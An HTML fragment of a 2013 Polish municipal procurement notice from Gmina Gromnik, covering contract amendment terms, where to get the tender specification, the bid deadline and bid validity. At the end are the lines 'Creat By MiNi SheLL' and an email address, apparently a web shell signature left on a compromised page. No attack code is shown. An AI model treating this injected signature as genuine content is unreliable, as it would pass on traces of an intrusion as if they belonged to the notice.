<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 w/w ustawy zmiana postanowień umowy w stosunku do treści oferty Wykonawcy możliwa jest wyłącznie w przypadkach zaistnienia jednej z następujących okoliczności: 
1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, 
2) zmiana danych teleadresowych lub numerów konta Zamawiającego lub Wykonawcy, 
3) zmiany stawki podatku VAT w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
4) w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy  nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia  wiadomości o tych okolicznościach, w tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę/ Zamawiającego powinien wpłynąć do Zamawiającego/Wykonawcy w formie pisemnej przed planowanym wprowadzeniem zmian. 
We wniosku o zmianę warunków umowy należy podać czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany.
Zmiany do umowy muszą być  wprowadzane aneksem w formie pisemnej pod rygorem nieważności po wcześniejszym zaakceptowaniu przez Zamawiającego/Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gromnik.pl przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje istotnych warunków zamówienia można odebrać osobiście w Urzędzie Gminy Gromnik, ul. Witosa 2, 33-180 Gromnik, pokój nr 10 , w cenie 10 zł, lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2013 godzina 09:00, miejsce: Urząd Gminy Gromnik, ul. Witosa 2, 33-180 Gromnik, pokój nr 1 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com